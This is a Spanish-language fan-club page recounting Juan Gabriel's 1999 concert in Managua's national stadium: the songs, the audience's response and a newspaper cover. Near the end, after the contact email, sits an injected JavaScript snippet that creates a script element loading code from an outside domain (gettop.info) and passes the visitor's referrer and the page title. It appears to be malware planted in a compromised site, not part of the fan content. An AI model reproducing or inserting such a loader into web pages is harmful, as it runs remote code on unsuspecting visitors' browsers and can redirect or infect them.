Nicaragua

Juan Gabriel solamente dio un solo recital en el país de Nicaragua y fue el 03 de diciembre de 1999 en el Estadio Nacional de Béisbol en una presentación que tenía por nombre “Un brindis por el 2000”.

Juan Gabriel llegó a ese país con más de 40 personas y con su mariachi. La primera canción fue el rítmico “Noa Noa”, pero lo que hizo estallar en euforia al público fueron sus improvisaciones cantando “¡Viva Nicaragua!”, “¡Me gusta estar aquí!”, “¡Viva Nicaragua!”, con la asistieron de más de 19 mil personas canto durante más de tres horas con las canciones más populares y aclamadas por los nicaragüenses.

“Querida” fue sin lugar a duda era uno de los temas más esperados, con solo la melodía, el público estalló en aplausos y gritos, y una vez más Juan Gabriel tocó la sensibilidad de los asistentes al improvisar “Querida” , “Nicaragua”, “Querida”. “He esperado 28 años para venir a cantarles” y su ya tradicional “gracias por cantar mis canciones”, fueron frases que emocionó al público que cantó junto a él.

Llego el momento del cierre y los espectadores gritaron “otra, otra, otra”, y él accedió y cerró el concierto con “Hasta que te conocí”, tema que el público cantó emocionado.

JGCF: En Nicaragua

 

Portada de la Revista La Prensa, Sábado 4 de diciembre de 1999

JGCF: En Nicaragua

Si tenes fotos o videos de este concierto y quieres compartirlo envialo a juangabrielclubdefans@gmail.com

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

shares